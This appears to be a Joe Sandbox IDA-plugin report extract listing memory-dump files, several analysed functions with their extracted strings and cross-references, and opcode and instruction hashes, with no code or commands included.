Source File: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: &4]$'zw$5io$A#uy$[35}$[3~~$O~[
API String ID: 0-2704232750
Opcode ID: 62cd84158746c360700f2aba7868011880dc6f9c9df0e89f2367588b99509d11
Instruction ID: 3b954aa62288eb02359faaf3992ac461f43492d4b2d3d02f0d21d05570344e26
Opcode Fuzzy Hash: 62cd84158746c360700f2aba7868011880dc6f9c9df0e89f2367588b99509d11
Instruction Fuzzy Hash: 00B23CF3A0C2149FE304AE2DEC8567BBBD9EF94360F164A3DEAC4C3744E53598058696

Function 0040FCEE Relevance: 10.4, Strings: 7, Instructions: 1637COMMON

Download Yara Rule

Strings

#^+~, xrefs: 00410AD9
!4[}, xrefs: 00410399
.(?, xrefs: 0041034E
dw, xrefs: 00410511
_;oS, xrefs: 00410F5A
'3w, xrefs: 00410F16
Yo, xrefs: 00410454

Memory Dump Source

Source File: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: !4[}$#^+~$'3w$.(?$Yo$_;oS$dw
API String ID: 0-410288182
Opcode ID: dfe288874be3cc7ea35029f90e02280bf73757bb024357e07f88027f771e6820
Instruction ID: b1f1ee20123505c1e40d2c6c7b23602d48b6f802db54eab3bef92c6d31c41eaf
Opcode Fuzzy Hash: dfe288874be3cc7ea35029f90e02280bf73757bb024357e07f88027f771e6820
Instruction Fuzzy Hash: 43B226F360C2049FE3046E2DEC8567AFBE9EF94720F1A4A3DEAC4C3744E67558058696

Function 00263770 Relevance: 9.5, Strings: 7, Instructions: 748COMMON

Download Yara Rule

Strings

;I&, xrefs: 00264007
PI&, xrefs: 00263FDB
D&, xrefs: 0026425B
LC&, xrefs: 00263781
K&, xrefs: 002641FB
b6&, xrefs: 00263F11, 00263F2F, 00263F4D, 00263F81, 00263F9F, 00263FBD, 0026401D, 00264051, 0026406F, 0026408D, 002640C1, 002640F5, 00264113, 00264131, 0026414F, 0026416D, 002641A1, 002641BF, 002641DD, 0026423D, 00264281, 0026429F, 002642B7
JJ&, xrefs: 00264211

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: K&$;I&$JJ&$LC&$PI&$b6&$D&
API String ID: 0-1550467482
Opcode ID: c84a48c733859c09b647feac5e3b5ce60ed98ac7f57062cbf301a5455ef21552
Instruction ID: b8f3c06d0d0fb2f874682bbbf3a636814577bdb2486aa3bf955df1e1b0054dec
Opcode Fuzzy Hash: c84a48c733859c09b647feac5e3b5ce60ed98ac7f57062cbf301a5455ef21552
Instruction Fuzzy Hash: 8572ADB0618B808ED326CB3C8845797BFD56B5A324F184A6DD0EE873D2C7756105CB66

Function 0026702F Relevance: 9.5, Strings: 7, Instructions: 730COMMON

Download Yara Rule

Strings

i7b0, xrefs: 0026714F
:?-), xrefs: 0026715F
~x||, xrefs: 002670EF
"u&, xrefs: 00267510
3768, xrefs: 00267157
2y&, xrefs: 00267929
InA>, xrefs: 002670D0

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: "u&$2y&$3768$:?-)$InA>$i7b0$~x||
API String ID: 0-2816309457
Opcode ID: 7ceca70632e3b00c8c0eefc2b79de0c1a3917300e7001dd2b4f0e787fa49fdc5
Instruction ID: 7927579e8d28c53a297a002de948fca2f81effe247a33203a68167cef8a98edd
Opcode Fuzzy Hash: 7ceca70632e3b00c8c0eefc2b79de0c1a3917300e7001dd2b4f0e787fa49fdc5
Instruction Fuzzy Hash: 7D324436A19302DFD314CF28EC9062AB7E1FF89314F19896DE985973A1D734E861CB81

Function 0025ED48 Relevance: 9.3, Strings: 7, Instructions: 573COMMON

Download Yara Rule

Strings

[lT, xrefs: 0025EFDF
%, xrefs: 0025F505
?c;}, xrefs: 0025ED96
iX), xrefs: 0025EEA6
ij, xrefs: 0025EE6F
]Z[, xrefs: 0025EF76
ZlT, xrefs: 0025EF83

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: [lT$ %$?c;}$iX)$ij$ZlT$]Z[
API String ID: 0-146611857
Opcode ID: 6dabf024ecc2314bb65b960f9b6d7e1dfcbd3a71155092ca343372e12f311d7f
Instruction ID: 1dc9fc666d0a41aa201048fe2b639adec1b3916933b7b66bb49abe739152b378
Opcode Fuzzy Hash: 6dabf024ecc2314bb65b960f9b6d7e1dfcbd3a71155092ca343372e12f311d7f
